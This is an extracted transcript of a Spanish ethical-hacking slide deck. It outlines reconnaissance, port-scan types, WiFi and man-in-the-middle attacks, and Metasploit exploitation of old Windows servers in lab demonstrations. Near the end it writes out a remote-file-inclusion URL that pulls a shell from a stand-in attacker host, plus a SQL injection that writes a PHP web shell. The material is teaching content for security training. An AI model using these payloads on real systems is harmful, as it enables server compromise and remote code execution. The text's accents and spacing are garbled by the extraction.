tecnicas avanzadas de penetracion a sistemas

55
Técnicas avanzadas de penetración a sistemas Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU

Upload: xavigato

Post on 08-Nov-2015

21 views

Category:

Documents


0 download

DESCRIPTION

Tecnicas avanzadas de penetracion en sistemas informaticos- Haking Etico

TRANSCRIPT

HACKING ETICO

Tcnicas avanzadas de penetracin a sistemas

Ponente: Rafael Gmez Del ngel Aka : NoSfEr@tU

HACKING ETICOLos hackers ticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.

QUE ES UN HACKERExperto en algn campo de la informticaConocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redesConocimientos de hardware y software.

Pasos previos al ATAQUE

ReconocimientoPasivoActivoRastreo (escaner)AccesoNiveles del SistemaRedesDOSMantener el accesoBorrado de huellas

FOOTPRINTINGObtencin de los perfiles de seguridad de una organizacin haciendo uso de una metodologa (footprinting).

El resultado del footprinting es un perfil nico de la organizacin en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.

FOOTPRINTING1.- Obtener informacin inicial whois nslookup2.- Localizar el rango de red Traceroute

TIPOS DE ATAQUES1.- Hacking WIFI2.-DOS3.-DDOS4.-M.I.T5.- Envenenamiento DNS6.-Reverse Shell7.-Port scaning

8.-Inyecciones SQL9.-R.F.I10.-XSS11.-Inyeccion de comandos arbitrarios12.-Hijacking13.-Cookie poisoning

Hacking Wifi

Definiciones

BSSID IVSSSID Mode monitorAP WEPSTATION WPADOS

Hacking WEP Fake APWifi DOS (A usuarios y sobre saturacin de frecuencias) Que Ataques analizaremos?

Fake Ap mtodo De Ataque y contra Ataque

DOS (Denial of service)En redes Wifi

*Sobre saturacion de Frecuencias

*Des-autentificacion infinita de usuarios

Deteccin y AnlisisWardriving

Escaneo de PuertosEl escaneo de puertos es el ataque primario y mas comn utilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender

Tcnicas

TCP connect ()Reverse IdentTCP SYNZombie scanTCP FINACK ScanNull ScanXmas ScanSYN/ACK ScanFragmentacin TCPTCP echoUDP echoTCP ACKTCP SYNICMP echoUDP scanFTP bounce scanAbiertoMedio abiertoSilenciosoBarridosOtrosTipo de escaneo

TCP connect()La mas comn de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCP

Intenta establecer conexinSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silencioso

Muy rpido e invasivo y llamativo en exceso. * Miles de conexiones*Logs

ComportamientoTCP connect()Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker[0] Puerto TCP Victima OPEN

Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker [O] P. TCP abierto en la VictimaHacker [O] P. TCP abierto en la Victima

Hacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima

ACK scanDestinado a identificar aquellos puertos que estn en estado silencioso de forma precisa cuando un puerto esta en este estado o no.Enva paquetes ACK con nmeros de secuencia y confirmacin aleatorios.si el puerto esta abierto, responder con un paquete RST, pues no identificara la conexin como suyasi el puerto esta cerrado responder RST pero si no responde es que esta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.

ComportamientoACK scanHacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima

Null scanSimilar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responder con RST y En caso de no recibir nada el puerto esta abierto o silencioso.

Ciertos firewalls vigilan los paquetes de finalizacin aqu hace lo que FIN no.

ComportamientoNull scanHacker ---[ ]---> [O] Puerto TCP abierto en la Victima

local ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima

La razn

POC Analizar 2 tipos de escaneo con la intencin de evadir un firewall y obtener informacin acerca de los puertos abiertos.

Ataques MIT

DNS cache poisoningARP PoisoningPhishing

EXPLOTACION

Escner de vulnerabilidades

Escner de vulnerabilidades

EXPLOTACION

MetasploitWindows Server 2003

PenetracinWindows Server 2003prueba de concepto

Puerto 445ms08067Crear usuarioHabilitar Escritorio RemotoCambiar la contrasea del Administrador

OBJETIVOMostrar el ataque de penetracin a Windows server 2003 en un ambiente controlado.MetasploitWindows Server 2008 R2

MetasploitWindows Server 2008 R2

Numero de vulnerabilidad : ms09050Encontrar el servidor verificando versin de smbExplotar la vulnerabilidad Denegacin de servicios.

OBJETIVOMostrar el ataque de Denegacin de servicios a Windows server 2008 en un ambiente controlado.MetasploitWindows XP SP3

MetasploitPenetracin a Windows XP SP3 Prueba de concepto

Encontrar la victima verificando versin de SMBLograr la obtencin de una reverse shell Habilitar el uso de escritorio remotoInyectar la conexin a escritorio remoto

OBJETIVOMostrar el ataque de penetracin a windows XP sp3 en un ambiente controlado.MetasploitWindows 7

MetasploitWindows 7 PenetracinPrueba de conceptoUsar INGENIERIA SOCIAL

Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELLVulnerar navegador web.

UPLOAD MI PATH C:\DESTINO\\Downloads

OBJETIVOMostrar el ataque de penetracin a windows 7 en un ambiente controlado.Ataques WEB

Ataques XSS

Analicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que con estos ataques ser posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador

Ataques XSS

Ataques XSS

Ataques XSS

Ataques RFIRemote file inclusion

vulnerabilidad que afecta nicamente a paginas dinmicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.

RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitado conocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variable recibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scriptsprogramados para explotar dicha vulnerabilidad.Ataques RFIRemote file inclusion

http://www.victima.com/index.php?nav=pagina1phphttp://www.victimacom/index.php?nav=pagina2.php

http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls

Inyeccion SQLunion all select "",2,3,4into outfile"/var/www/html/exec.php"

Analicemos este cdigo